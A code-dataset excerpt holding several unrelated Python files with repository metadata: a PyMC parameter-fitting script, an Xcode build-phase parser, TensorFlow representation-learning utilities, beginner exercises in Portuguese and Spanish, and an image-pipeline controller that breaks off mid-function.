yspecies = ysim_array[:, :len(model.species)]
ydata = yspecies * (random.randn(*yspecies.shape) * sigma + 1);
ysim_max = yspecies.max(0)
ydata_norm = ydata / ysim_max
solver = Solver(model, tspan)
# Set up the parameter vector for the solver
nominal_rates = [model.parameters[n].value for n in ('A_0', 'B_0', 'C_0')]
# Stochastic variables for the rate parameters.
# Given lognormal priors with their correct order-of-mag mean but with a
# variance of 10 base 10 log units
k1 = Lognormal('k1', mu=np.log(1e-2), tau=1/(np.log(10)*np.log(1e10)),
value=1e-2, plot=True)
k2 = Lognormal('k2', mu=np.log(1e7), tau=1/(np.log(10)*np.log(1e10)),
value=1e7, plot=True)
k3 = Lognormal('k3', mu=np.log(1e4), tau=1/(np.log(10)*np.log(1e10)),
value=1e4, plot=True)
# The model is set up as a deterministic variable
@deterministic(plot=False)
def robertson_model(k1=k1, k2=k2, k3=k3):
    """Deterministic PyMC node: normalized ODE trajectories for the rates.

    Runs the solver with the sampled [k1, k2, k3] plus the fixed initial
    conditions, divides by the noise-free per-species maxima and returns
    the flattened trajectory vector.
    """
    solver.run(np.concatenate((np.array([k1, k2, k3]), nominal_rates)))
    yout = solver.y / ysim_max # Normalize the simulation
    return yout.flatten()
# The precision (1/variance) matrix
tau = np.eye(len(tspan)*3) * 10
output = MvNormal('output', mu=robertson_model, tau=tau, observed=True,
value=ydata_norm.flatten())
if __name__ == '__main__':
# Create the MCMC object and start sampling
pymc_model = pymc.Model([k1, k2, k3, robertson_model, output])
mcmc = MCMC(pymc_model)
mcmc.sample(iter=10000, burn=5000, thin=5)
# Show the pymc histograms and autocorrelation plots
plt.ion()
pymc.Matplot.plot(mcmc)
plt.show()
# Plot the original data along with the sampled trajectories
plt.figure()
plt.plot(tspan, ydata_norm[:,0], 'r')
plt.plot(tspan, ydata_norm[:,1], 'g')
plt.plot(tspan, ydata_norm[:,2], 'b')
num_timecourses = 1000
num_iterations_sampled = mcmc.trace('robertson_model')[:].shape[0]
plt.plot(tspan, mcmc.trace('robertson_model')[num_iterations_sampled -
num_timecourses:,0::3].T, alpha=0.05, color='r')
plt.plot(tspan, mcmc.trace('robertson_model')[num_iterations_sampled -
num_timecourses:,1::3].T, alpha=0.05, color='g')
plt.plot(tspan, mcmc.trace('robertson_model')[num_iterations_sampled -
num_timecourses:,2::3].T, alpha=0.05, color='b')
# Show k1/k3 scatter plot
plt.figure()
plt.scatter(mcmc.trace('k1')[:], mcmc.trace('k3')[:])
| 176 | 0 | 22 |
040444bcd04f4b65f9da89ffa08d0cc4db3aac35 | 2,818 | py | Python | xcparse/Xcode/PBX/PBXShellScriptBuildPhase.py | samdmarshall/xcparser | 4f78af149127325e60e3785b6e09d6dbfeedc799 | [
"BSD-3-Clause"
] | 59 | 2015-02-27T21:45:37.000Z | 2021-03-16T04:37:40.000Z | xcparse/Xcode/PBX/PBXShellScriptBuildPhase.py | samdmarshall/xcparser | 4f78af149127325e60e3785b6e09d6dbfeedc799 | [
"BSD-3-Clause"
] | 14 | 2015-03-02T18:53:51.000Z | 2016-07-19T23:20:23.000Z | xcparse/Xcode/PBX/PBXShellScriptBuildPhase.py | samdmarshall/xcparser | 4f78af149127325e60e3785b6e09d6dbfeedc799 | [
"BSD-3-Clause"
] | 8 | 2015-03-02T02:32:09.000Z | 2017-07-31T21:14:51.000Z | from .PBXResolver import *
from .PBX_Base_Phase import *
from .PBX_Constants import *
from ...Helpers import logging_helper
from ...Helpers import xcrun_helper
from ...Helpers import path_helper | 46.966667 | 144 | 0.66572 | from .PBXResolver import *
from .PBX_Base_Phase import *
from .PBX_Constants import *
from ...Helpers import logging_helper
from ...Helpers import xcrun_helper
from ...Helpers import path_helper
class PBXShellScriptBuildPhase(PBX_Base_Phase):
    """PBX build phase that runs a user-provided shell script (Python 2)."""

    def __init__(self, lookup_func, dictionary, project, identifier):
        """Parses the shell-script phase entries from the pbxproj dictionary.

        Reads the script text, interpreter path, input/output file lists and
        the 'show environment variables in log' flag (defaults to on).
        """
        super(PBXShellScriptBuildPhase, self).__init__(lookup_func, dictionary, project, identifier);
        self.bundleid = 'com.apple.buildphase.shell-script';
        self.phase_type = 'Run Shell Script';
        if kPBX_PHASE_shellScript in dictionary.keys():
            self.shellScript = str(dictionary[kPBX_PHASE_shellScript]);
        if kPBX_PHASE_shellPath in dictionary.keys():
            self.shellPath = str(dictionary[kPBX_PHASE_shellPath]);
        if kPBX_PHASE_inputPaths in dictionary.keys():
            inputPaths = [];
            for inputPath in dictionary[kPBX_PHASE_inputPaths]:
                inputPaths.append(inputPath);
            self.inputPaths = inputPaths;
        if kPBX_PHASE_outputPaths in dictionary.keys():
            outputPaths = [];
            for outputPath in dictionary[kPBX_PHASE_outputPaths]:
                outputPaths.append(outputPath);
            self.outputPaths = outputPaths;
        # Env vars are shown in the log unless the project disables them.
        self.showEnvVarsInLog = 1;
        if kPBX_PHASE_showEnvVarsInLog in dictionary.keys():
            self.showEnvVarsInLog = dictionary[kPBX_PHASE_showEnvVarsInLog];

    def performPhase(self, build_system, target):
        """Writes the phase's script into the intermediates directory and
        logs how it would be invoked.

        NOTE(review): the script is written but not actually executed --
        the real subprocess call is commented out at the bottom.
        """
        phase_spec = build_system.getSpecForIdentifier(self.bundleid);
        print '%s Phase: %s' % (self.phase_type, phase_spec.name);
        print '* %s' % (phase_spec.contents['Description']);
        resolved_values = build_system.environment.resolvedValues();
        config_name = build_system.environment.valueForKey('CONFIGURATION', lookup_dict=resolved_values);
        symroot = build_system.environment.valueForKey('SYMROOT', lookup_dict=resolved_values);
        script_dir_path = xcrun_helper.IntermediatesBuildLocation(target.project_container.rootObject, target.name.value, config_name, symroot);
        path_helper.create_directories(script_dir_path);
        script_path = os.path.join(script_dir_path, str('Script-'+self.identifier+'.sh'));
        # Write the script with a shebang taken from the configured shell.
        fd = open(script_path, 'w');
        env = '#!' + self.shellPath
        print >> fd, env;
        print >> fd, self.shellScript;
        fd.close();
        if self.showEnvVarsInLog == 1:
            for export_item in build_system.environment.exportValues():
                print '\t'+export_item;
        # this needs to export the environment variables
        print '/bin/sh -c '+script_path;
        # print xcrun_helper.make_subprocess_call(('/bin/sh','-c', script_path));
print ''; | 2,513 | 26 | 85 |
5a2c7ea488a79c7bc3ca61ffc7923ed29c059cad | 181 | py | Python | EstruturaSequencial/03.py | TheCarvalho/atividades-wikipython | 9163d5de40dbed0d73917f6257e64a651a77e085 | [
"Unlicense"
] | null | null | null | EstruturaSequencial/03.py | TheCarvalho/atividades-wikipython | 9163d5de40dbed0d73917f6257e64a651a77e085 | [
"Unlicense"
] | null | null | null | EstruturaSequencial/03.py | TheCarvalho/atividades-wikipython | 9163d5de40dbed0d73917f6257e64a651a77e085 | [
"Unlicense"
] | null | null | null | '''
3. Faça um Programa que peça dois números e imprima a soma.
'''
num1 = int(input('Insira o primeiro número: '))  # first addend
num2 = int(input('Insira o segundo número: '))  # second addend
print(num1+num2)  # print the sum of the two numbers
| 22.625 | 59 | 0.685083 | '''
3. Faça um Programa que peça dois números e imprima a soma.
'''
num1 = int(input('Insira o primeiro número: '))
num2 = int(input('Insira o segundo número: '))
print(num1+num2)
| 0 | 0 | 0 |
a287fa8fd1aa9340094407b9ff28c613564df1de | 8,205 | py | Python | utils.py | kristinakupf/revisiting-self-supervised | 1eac8a76c1b002d74b4b2983739d2e0280f5a09c | [
"Apache-2.0"
] | 360 | 2019-01-25T17:59:18.000Z | 2022-02-23T22:21:51.000Z | utils.py | kristinakupf/revisiting-self-supervised | 1eac8a76c1b002d74b4b2983739d2e0280f5a09c | [
"Apache-2.0"
] | 7 | 2019-02-05T15:09:31.000Z | 2021-11-13T21:08:08.000Z | utils.py | rickyHong/Puzzle-tensorflow-latest-repl | 86315b94bb8652eff37c5cd27459eae414d9143e | [
"Apache-2.0"
] | 44 | 2019-01-28T02:05:31.000Z | 2021-09-19T09:34:27.000Z | #!/usr/bin/python
#
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Util functions for representation learning.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import csv
import re
import numpy as np
import tensorflow as tf
INPUT_DATA_STR = "input_data"
IS_TRAINING_STR = "is_training"
REPR_PREFIX_STR = "representation_"
TAGS_IS_TRAINING = ["is_training"]
def adaptive_pool(inp, num_target_dimensions=9000, mode="adaptive_max"):
  """Adaptive pooling layer.

  This layer performs adaptive pooling, such that the total
  dimensionality of output is not bigger than num_target_dimension

  Args:
    inp: input tensor; assumed NHWC with square spatial dimensions (only
      the first spatial dim and the channel count are read) -- TODO confirm
    num_target_dimensions: maximum number of output dimensions
    mode: one of {"adaptive_max", "adaptive_avg", "max", "avg"}

  Returns:
    Result of the pooling operation

  Raises:
    ValueError: mode is unexpected.
  """
  size, _, k = inp.get_shape().as_list()[1:]
  if mode in ["adaptive_max", "adaptive_avg"]:
    if mode == "adaptive_max":
      pool_fn = tf.nn.fractional_max_pool
    else:
      pool_fn = tf.nn.fractional_avg_pool
    # Find the optimal target output tensor size
    target_size = (num_target_dimensions / float(k)) ** 0.5
    # Round to whichever integer side length lands closest to the budget.
    if (abs(num_target_dimensions - k * np.floor(target_size) ** 2) <
        abs(num_target_dimensions - k * np.ceil(target_size) ** 2)):
      target_size = max(np.floor(target_size), 1.0)
    else:
      target_size = max(np.ceil(target_size), 1.0)
    # Get optimal stride. Subtract epsilon to ensure correct rounding in
    # pool_fn.
    stride = size / target_size - 1.0e-5
    # Make sure that the stride is valid
    stride = max(stride, 1)
    stride = min(stride, size)
    result = pool_fn(inp, [1, stride, stride, 1])[0]
  elif mode in ["max", "avg"]:
    if mode == "max":
      pool_fn = tf.contrib.layers.max_pool2d
    else:
      pool_fn = tf.contrib.layers.avg_pool2d
    total_size = float(np.prod(inp.get_shape()[1:].as_list()))
    stride = int(np.ceil(np.sqrt(total_size / num_target_dimensions)))
    # Clamp to a legal stride for the spatial extent.
    stride = min(max(1, stride), size)
    result = pool_fn(inp, kernel_size=stride, stride=stride)
  else:
    raise ValueError("Not supported %s pool." % mode)
  return result
def append_multiple_rows_to_csv(dictionaries, csv_path):
  """Appends one CSV row per dictionary, creating the file when needed.

  Args:
    dictionaries: a list of dictionaries, mapping from csv header to value.
    csv_path: path to the result csv file.
  """
  # The header is the sorted union of all keys across the rows.
  all_keys = set()
  for row in dictionaries:
    all_keys.update(row.keys())
  fieldnames = sorted(all_keys)
  if not tf.gfile.Exists(csv_path):
    # First write: emit the header line.
    with tf.gfile.Open(csv_path, "w") as f:
      csv.DictWriter(f, fieldnames).writeheader()
      f.flush()
  with tf.gfile.Open(csv_path, "a") as f:
    csv.DictWriter(f, fieldnames).writerows(dictionaries)
    f.flush()
def concat_dicts(dict_list):
  """Merges a list of dicts into one dict of concatenated tensors.

  Values that share a key across the input dictionaries are concatenated
  along the first axis.

  Args:
    dict_list: list of dictionaries

  Returns:
    d: merged dictionary
  """
  merged = collections.defaultdict(list)
  for entry in dict_list:
    for key, value in entry.items():
      merged[key].append(value)
  for key in merged:
    merged[key] = tf.concat(merged[key], axis=0)
  return merged
def str2intlist(s, repeats_if_single=None):
  """Parse a config's "1,2,3"-style string into a list of ints.

  Args:
    s: The string to be parsed, or possibly already an int.
    repeats_if_single: If s is already an int or is a single element list,
      repeat it this many times to create the list.

  Returns:
    A list of integers based on `s`.
  """
  if isinstance(s, int):
    parsed = [s]
  else:
    parsed = []
    for token in s.split(","):
      # A literal (unstripped) "None" maps to None; anything else must
      # parse as an int after stripping whitespace.
      parsed.append(None if token == "None" else int(token.strip()))
  if repeats_if_single is not None and len(parsed) == 1:
    parsed = parsed * repeats_if_single
  return parsed
def tf_apply_to_image_or_images(fn, image_or_images):
  """Applies a function to a single image or each image in a batch of them.

  Args:
    fn: the function to apply, receives an image, returns an image.
    image_or_images: Either a single image, or a batch of images.

  Returns:
    The result of applying the function to the image or batch of images.

  Raises:
    ValueError: if the input rank is smaller than 3.
  """
  static_rank = len(image_or_images.get_shape().as_list())
  if static_rank == 3:  # A single image: HWC
    return fn(image_or_images)
  elif static_rank == 4:  # A batch of images: BHWC
    return tf.map_fn(fn, image_or_images)
  elif static_rank > 4:  # A batch of images: ...HWC
    # Flatten all leading dimensions into one batch axis, map over it,
    # then restore the original shape. Requires the trailing H, W, C
    # dimensions to be statically known.
    input_shape = tf.shape(image_or_images)
    h, w, c = image_or_images.get_shape().as_list()[-3:]
    image_or_images = tf.reshape(image_or_images, [-1, h, w, c])
    image_or_images = tf.map_fn(fn, image_or_images)
    return tf.reshape(image_or_images, input_shape)
  else:
    raise ValueError("Unsupported image rank: %d" % static_rank)
def tf_apply_with_probability(p, fn, x):
  """Apply function `fn` to input `x` randomly `p` percent of the time.

  A fresh uniform sample is drawn on every graph execution, so the choice
  is made independently per call.

  Args:
    p: probability in [0, 1] of applying `fn`.
    fn: callable applied to `x` when the coin flip succeeds.
    x: the input; returned unchanged otherwise.

  Returns:
    Either `fn(x)` or `x`.
  """
  return tf.cond(
      tf.less(tf.random_uniform([], minval=0, maxval=1, dtype=tf.float32), p),
      lambda: fn(x),
      lambda: x)
def get_latest_hub_per_task(hub_module_paths):
  """Picks, for every task, the hub module with the largest timestamp.

  The hub module path should match format ".*/hub/[0-9]*/module/.*": the
  part before "/hub/" identifies the task and the number before "/module"
  is the export timestamp.

  Example usage:
    get_latest_hub_per_task(expand_glob(["/cns/el-d/home/dune/representation/"
                                         "xzhai/1899361/*/export/hub/*/module/"]))
    returns 4 latest hub module from 4 tasks respectivley.

  Args:
    hub_module_paths: a list of hub module paths.

  Returns:
    A sorted list of the latest hub module path for each task.
  """
  latest = {}
  for path in hub_module_paths:
    task_name, module_name = path.split("/hub/")
    timestamp = int(re.findall(r"([0-9]*)/module", module_name)[0])
    best = latest.get(task_name, "0/module")
    best_timestamp = int(re.findall(r"([0-9]*)/module", best)[0])
    if timestamp > best_timestamp:
      latest[task_name] = path
  return sorted(latest.values())
def get_classification_metrics(tensor_names):
  """Gets classification eval metric on input logits and labels.

  Args:
    tensor_names: a list of tensor names for _metrics input tensors.

  Returns:
    A function computes the metric result, from input logits and labels.
  """
  # Bug fix: _metrics referenced _top_k_accuracy, which was missing in this
  # copy of the function; the nested helper is restored here.
  def _top_k_accuracy(k, labels, logits):
    """Mean top-k accuracy (as a tf.metrics pair) for logits vs. labels."""
    in_top_k = tf.nn.in_top_k(predictions=logits, targets=labels, k=k)
    return tf.metrics.mean(tf.cast(in_top_k, tf.float32))

  def _metrics(labels, *tensors):
    """Computes the metric from logits and labels.

    Args:
      labels: ground truth labels.
      *tensors: tensors to be evaluated.

    Returns:
      Result dict mapping from the metric name to the list of result tensor
      and update_op used by tf.metrics.
    """
    metrics = {}
    assert len(tensor_names) == len(tensors), "Names must match tensors."
    for i in range(len(tensors)):
      tensor = tensors[i]
      name = tensor_names[i]
      for k in (1, 5):
        metrics["top%d_accuracy_%s" % (k, name)] = _top_k_accuracy(
            k, labels, tensor)
    return metrics
  return _metrics
| 30.276753 | 80 | 0.686776 | #!/usr/bin/python
#
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Util functions for representation learning.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import csv
import re
import numpy as np
import tensorflow as tf
INPUT_DATA_STR = "input_data"
IS_TRAINING_STR = "is_training"
REPR_PREFIX_STR = "representation_"
TAGS_IS_TRAINING = ["is_training"]
def adaptive_pool(inp, num_target_dimensions=9000, mode="adaptive_max"):
"""Adaptive pooling layer.
This layer performs adaptive pooling, such that the total
dimensionality of output is not bigger than num_target_dimension
Args:
inp: input tensor
num_target_dimensions: maximum number of output dimensions
mode: one of {"adaptive_max", "adaptive_avg", "max", "avg"}
Returns:
Result of the pooling operation
Raises:
ValueError: mode is unexpected.
"""
size, _, k = inp.get_shape().as_list()[1:]
if mode in ["adaptive_max", "adaptive_avg"]:
if mode == "adaptive_max":
pool_fn = tf.nn.fractional_max_pool
else:
pool_fn = tf.nn.fractional_avg_pool
# Find the optimal target output tensor size
target_size = (num_target_dimensions / float(k)) ** 0.5
if (abs(num_target_dimensions - k * np.floor(target_size) ** 2) <
abs(num_target_dimensions - k * np.ceil(target_size) ** 2)):
target_size = max(np.floor(target_size), 1.0)
else:
target_size = max(np.ceil(target_size), 1.0)
# Get optimal stride. Subtract epsilon to ensure correct rounding in
# pool_fn.
stride = size / target_size - 1.0e-5
# Make sure that the stride is valid
stride = max(stride, 1)
stride = min(stride, size)
result = pool_fn(inp, [1, stride, stride, 1])[0]
elif mode in ["max", "avg"]:
if mode == "max":
pool_fn = tf.contrib.layers.max_pool2d
else:
pool_fn = tf.contrib.layers.avg_pool2d
total_size = float(np.prod(inp.get_shape()[1:].as_list()))
stride = int(np.ceil(np.sqrt(total_size / num_target_dimensions)))
stride = min(max(1, stride), size)
result = pool_fn(inp, kernel_size=stride, stride=stride)
else:
raise ValueError("Not supported %s pool." % mode)
return result
def append_multiple_rows_to_csv(dictionaries, csv_path):
"""Writes multiples rows to csv file from a list of dictionaries.
Args:
dictionaries: a list of dictionaries, mapping from csv header to value.
csv_path: path to the result csv file.
"""
keys = set([])
for d in dictionaries:
keys.update(d.keys())
if not tf.gfile.Exists(csv_path):
with tf.gfile.Open(csv_path, "w") as f:
writer = csv.DictWriter(f, sorted(keys))
writer.writeheader()
f.flush()
with tf.gfile.Open(csv_path, "a") as f:
writer = csv.DictWriter(f, sorted(keys))
writer.writerows(dictionaries)
f.flush()
def concat_dicts(dict_list):
"""Given a list of dicts merges them into a single dict.
This function takes a list of dictionaries as an input and then merges all
these dictionaries into a single dictionary by concatenating the values
(along the first axis) that correspond to the same key.
Args:
dict_list: list of dictionaries
Returns:
d: merged dictionary
"""
d = collections.defaultdict(list)
for e in dict_list:
for k, v in e.items():
d[k].append(v)
for k in d:
d[k] = tf.concat(d[k], axis=0)
return d
def str2intlist(s, repeats_if_single=None):
"""Parse a config's "1,2,3"-style string into a list of ints.
Args:
s: The string to be parsed, or possibly already an int.
repeats_if_single: If s is already an int or is a single element list,
repeat it this many times to create the list.
Returns:
A list of integers based on `s`.
"""
if isinstance(s, int):
result = [s]
else:
result = [int(i.strip()) if i != "None" else None
for i in s.split(",")]
if repeats_if_single is not None and len(result) == 1:
result *= repeats_if_single
return result
def tf_apply_to_image_or_images(fn, image_or_images):
"""Applies a function to a single image or each image in a batch of them.
Args:
fn: the function to apply, receives an image, returns an image.
image_or_images: Either a single image, or a batch of images.
Returns:
The result of applying the function to the image or batch of images.
Raises:
ValueError: if the input is not of rank 3 or 4.
"""
static_rank = len(image_or_images.get_shape().as_list())
if static_rank == 3: # A single image: HWC
return fn(image_or_images)
elif static_rank == 4: # A batch of images: BHWC
return tf.map_fn(fn, image_or_images)
elif static_rank > 4: # A batch of images: ...HWC
input_shape = tf.shape(image_or_images)
h, w, c = image_or_images.get_shape().as_list()[-3:]
image_or_images = tf.reshape(image_or_images, [-1, h, w, c])
image_or_images = tf.map_fn(fn, image_or_images)
return tf.reshape(image_or_images, input_shape)
else:
raise ValueError("Unsupported image rank: %d" % static_rank)
def tf_apply_with_probability(p, fn, x):
"""Apply function `fn` to input `x` randomly `p` percent of the time."""
return tf.cond(
tf.less(tf.random_uniform([], minval=0, maxval=1, dtype=tf.float32), p),
lambda: fn(x),
lambda: x)
def expand_glob(glob_patterns):
  """Expands a list of glob patterns into the matching checkpoint paths.

  Args:
    glob_patterns: list of glob expressions understood by tf.gfile.Glob.

  Returns:
    The concatenated list of all matches.

  Raises:
    AssertionError: if no pattern matched anything.
  """
  checkpoints = []
  for pattern in glob_patterns:
    checkpoints.extend(tf.gfile.Glob(pattern))
  assert checkpoints, "There are no checkpoints in " + str(glob_patterns)
  return checkpoints
def get_latest_hub_per_task(hub_module_paths):
"""Get latest hub module for each task.
The hub module path should match format ".*/hub/[0-9]*/module/.*".
Example usage:
get_latest_hub_per_task(expand_glob(["/cns/el-d/home/dune/representation/"
"xzhai/1899361/*/export/hub/*/module/"]))
returns 4 latest hub module from 4 tasks respectivley.
Args:
hub_module_paths: a list of hub module paths.
Returns:
A list of latest hub modules for each task.
"""
task_to_path = {}
for path in hub_module_paths:
task_name, module_name = path.split("/hub/")
timestamp = int(re.findall(r"([0-9]*)/module", module_name)[0])
current_path = task_to_path.get(task_name, "0/module")
current_timestamp = int(re.findall(r"([0-9]*)/module", current_path)[0])
if current_timestamp < timestamp:
task_to_path[task_name] = path
return sorted(task_to_path.values())
def get_classification_metrics(tensor_names):
"""Gets classification eval metric on input logits and labels.
Args:
tensor_names: a list of tensor names for _metrics input tensors.
Returns:
A function computes the metric result, from input logits and labels.
"""
def _top_k_accuracy(k, labels, logits):
in_top_k = tf.nn.in_top_k(predictions=logits, targets=labels, k=k)
return tf.metrics.mean(tf.cast(in_top_k, tf.float32))
def _metrics(labels, *tensors):
"""Computes the metric from logits and labels.
Args:
labels: ground truth labels.
*tensors: tensors to be evaluated.
Returns:
Result dict mapping from the metric name to the list of result tensor and
update_op used by tf.metrics.
"""
metrics = {}
assert len(tensor_names) == len(tensors), "Names must match tensors."
for i in range(len(tensors)):
tensor = tensors[i]
name = tensor_names[i]
for k in (1, 5):
metrics["top%d_accuracy_%s" % (k, name)] = _top_k_accuracy(
k, labels, tensor)
return metrics
return _metrics
| 350 | 0 | 48 |
ea960da13a754b1b5f178921b94293782175191a | 2,046 | py | Python | Taller_Estructuras_de _Control_Selectivas/Ejercicio_15.py | Mariajosedibo19/Talleres_de_Algoritmos | db8f1eecc345be1877d9d7a62a3fa8cf3af2df7d | [
"MIT"
] | null | null | null | Taller_Estructuras_de _Control_Selectivas/Ejercicio_15.py | Mariajosedibo19/Talleres_de_Algoritmos | db8f1eecc345be1877d9d7a62a3fa8cf3af2df7d | [
"MIT"
] | null | null | null | Taller_Estructuras_de _Control_Selectivas/Ejercicio_15.py | Mariajosedibo19/Talleres_de_Algoritmos | db8f1eecc345be1877d9d7a62a3fa8cf3af2df7d | [
"MIT"
] | null | null | null | """
Datos de entrada
edad del paciente = edad = int
sexo del paciente = sexo_paciente = int
Datos de salida
Resultado positivo o negativo acerca de si el paciente tiene anemia = resultado = str
"""
# Inputs (prompts stay in Spanish for the end user)
edad_paciente=int(input("Inserte la edad del paciente en su equivalente de años a meses "))
sexo_paciente=str(input("Inserte su sexo de la siguiente manera , femenino (F) o masculino (M) "))
nivel_hemoglobina=float(input("Inserte cual fue el resultado del nivel de hemoglobina en la sangre "))
sexo= sexo_paciente[0] # keep only the first character of the answer
# Decision logic: each branch checks the normal hemoglobin range for an
# age band; ages are expressed in months.
resultado=''
if (nivel_hemoglobina>=13 and nivel_hemoglobina<=26) and(edad_paciente>=0 and edad_paciente<=1):
    resultado=(" El resultado es Negativo")
elif(nivel_hemoglobina>=10 and nivel_hemoglobina<=18)and(edad_paciente>1 and edad_paciente<=6):
    resultado=(" El resultado es Negativo")
elif(nivel_hemoglobina>=11 and nivel_hemoglobina<=15)and(edad_paciente>6 and edad_paciente<=12):
    resultado=(" El resultado es Negativo")
elif (nivel_hemoglobina>=11.5 and nivel_hemoglobina<=15) and (edad_paciente>12 and edad_paciente<=60): # 1 to 5 years, in months
    resultado=(" El resultado es Negativo")
elif (nivel_hemoglobina>=12.6 and nivel_hemoglobina<=15.5) and (edad_paciente>60 and edad_paciente<=120): # 5 to 10 years, in months
    resultado=(" El resultado es Negativo")
elif (nivel_hemoglobina>=13 and nivel_hemoglobina<=15.5) and(edad_paciente>120 and edad_paciente<=180): # 10 to 15 years, in months
    resultado=(" El resultado es Negativo")
elif (nivel_hemoglobina>=12 and nivel_hemoglobina<=16 ) and (edad_paciente>180 and sexo=="F"): # over 15 years, female
    resultado=(" El resultado es Negativo")
elif (nivel_hemoglobina>=14 and nivel_hemoglobina<=18) and (edad_paciente>180 and sexo=="M"): # over 15 years, male
    resultado=(" El resultado es Negativo")
else:
    resultado= "El resultado es positivo"
# Output
print(resultado)
| 39.346154 | 153 | 0.747312 | """
Datos de entrada
edad del paciente = edad = int
sexo del paciente = sexo_paciente = int
Datos de salida
Resultado positivo o negativo acerca de si el paciente tiene anemia = resultado = str
"""
# Entradas
edad_paciente=int(input("Inserte la edad del paciente en su equivalente de años a meses "))
sexo_paciente=str(input("Inserte su sexo de la siguiente manera , femenino (F) o masculino (M) "))
nivel_hemoglobina=float(input("Inserte cual fue el resultado del nivel de hemoglobina en la sangre "))
sexo= sexo_paciente[0] # Es la posicion del caracter que quiero que tome
# Caja Negra
resultado=''
if (nivel_hemoglobina>=13 and nivel_hemoglobina<=26) and(edad_paciente>=0 and edad_paciente<=1):
resultado=(" El resultado es Negativo")
elif(nivel_hemoglobina>=10 and nivel_hemoglobina<=18)and(edad_paciente>1 and edad_paciente<=6):
resultado=(" El resultado es Negativo")
elif(nivel_hemoglobina>=11 and nivel_hemoglobina<=15)and(edad_paciente>6 and edad_paciente<=12):
resultado=(" El resultado es Negativo")
elif (nivel_hemoglobina>=11.5 and nivel_hemoglobina<=15) and (edad_paciente>12 and edad_paciente<=60): # Equivalencia entre 1 año y 5 años en meses
resultado=(" El resultado es Negativo")
elif (nivel_hemoglobina>=12.6 and nivel_hemoglobina<=15.5) and (edad_paciente>60 and edad_paciente<=120): # Equivalencia entre 5 años y 10 años en meses
resultado=(" El resultado es Negativo")
elif (nivel_hemoglobina>=13 and nivel_hemoglobina<=15.5) and(edad_paciente>120 and edad_paciente<=180): # Equivalencia entre 10 año y 15 años en meses
resultado=(" El resultado es Negativo")
elif (nivel_hemoglobina>=12 and nivel_hemoglobina<=16 ) and (edad_paciente>180 and sexo=="F"): # Equivalencia de 15 a meses
resultado=(" El resultado es Negativo")
elif (nivel_hemoglobina>=14 and nivel_hemoglobina<=18) and (edad_paciente>180 and sexo=="M"): # Equivalencia de 15
resultado=(" El resultado es Negativo")
else:
resultado= "El resultado es positivo"
#Salidas
print(resultado)
| 0 | 0 | 0 |
1aab9f57469dfa09590632b595dd434c94b550b5 | 4,350 | py | Python | core/controllers/image.py | zihbot/vision-line | 3718a51da7c3f5219da12a9a26cb7ebacafe9a2a | [
"MIT"
] | null | null | null | core/controllers/image.py | zihbot/vision-line | 3718a51da7c3f5219da12a9a26cb7ebacafe9a2a | [
"MIT"
] | null | null | null | core/controllers/image.py | zihbot/vision-line | 3718a51da7c3f5219da12a9a26cb7ebacafe9a2a | [
"MIT"
] | null | null | null | from collections import namedtuple
from repositories.lines import LineORM
import cv2
import logging
from function_factory import FunctionFactory
from api import models
import time
# Module-level logger for this controller.
logger = logging.getLogger(__name__)
# In-memory line record: display name, last-modified timestamp, node list.
_Line=namedtuple('_Line', 'name last_change nodes')
# Module-level store of in-memory lines; the 'asd' entry looks like
# leftover test data -- confirm before relying on it.
lines: list[_Line] = [_Line(name='asd', last_change=1413534, nodes=[])]
| 30.208333 | 81 | 0.674253 | from collections import namedtuple
from repositories.lines import LineORM
import cv2
import logging
from function_factory import FunctionFactory
from api import models
import time
# Module-level logger for this controller.
logger = logging.getLogger(__name__)
# In-memory line record: display name, last-modified timestamp, node list.
_Line=namedtuple('_Line', 'name last_change nodes')
# Module-level store of in-memory lines; the 'asd' entry looks like
# leftover test data -- confirm before relying on it.
lines: list[_Line] = [_Line(name='asd', last_change=1413534, nodes=[])]
def mapLineOrmToModel(orm: LineORM) -> models.Line:
    """Convert a persisted LineORM row into its API model representation."""
    node_count = len(orm.nodes)
    return models.Line(orm.id, orm.name, node_count, orm.last_change)
def mapLineModelToOrm(model: models.Line) -> LineORM:
    """Build a LineORM row from an API model; the node list starts empty."""
    row = LineORM()
    row.id = model.id
    row.name = model.name
    row.last_change = model.last_change
    row.nodes = []
    return row
def post_create_image_bck(data: list[dict]) -> bytes:
    """Read the static 'img.jpg' file and return it JPEG-encoded.

    Args:
        data: Unused; kept for interface compatibility with the router.

    Returns:
        The image as raw JPEG bytes.

    Raises:
        ValueError: If the image cannot be read or encoded.
    """
    img = cv2.imread('img.jpg')
    # cv2.imread returns None (no exception) when the file is missing.
    if img is None:
        raise ValueError("could not read 'img.jpg'")
    # Fix: the original printed a debug line and ignored the success flag,
    # returning invalid bytes on encode failure.
    is_success, buffer_array = cv2.imencode('.jpg', img)
    if not is_success:
        raise ValueError("JPEG encoding of 'img.jpg' failed")
    return buffer_array.tobytes()
def post_create_image(data: list[dict]) -> int:
    """Register a new in-memory line built from *data*; return its index."""
    logger.debug('post_create_image data=%s', data)
    new_line = _Line(name='xxx', last_change=0, nodes=data)
    lines.append(new_line)
    # The new line is always the last element.
    return len(lines) - 1
def create_image_add(line_id: int, position: int, data: dict) -> int:
    """Insert a node description at *position* in the given in-memory line."""
    logger.debug('patch_create_image data=%s', data)
    target = lines[line_id]
    target.nodes.insert(position, data)
    return True
def create_image_edit(line_id: int, position: int, data: dict) -> int:
    """Overwrite the node description at *position* in the given line."""
    logger.debug('create_image_edit data=%s', data)
    target = lines[line_id]
    target.nodes[position] = data
    return True
def create_image_reorder(line_id: int, data: list[int]) -> int:
    """Reorder the nodes of an in-memory line by an index permutation.

    Args:
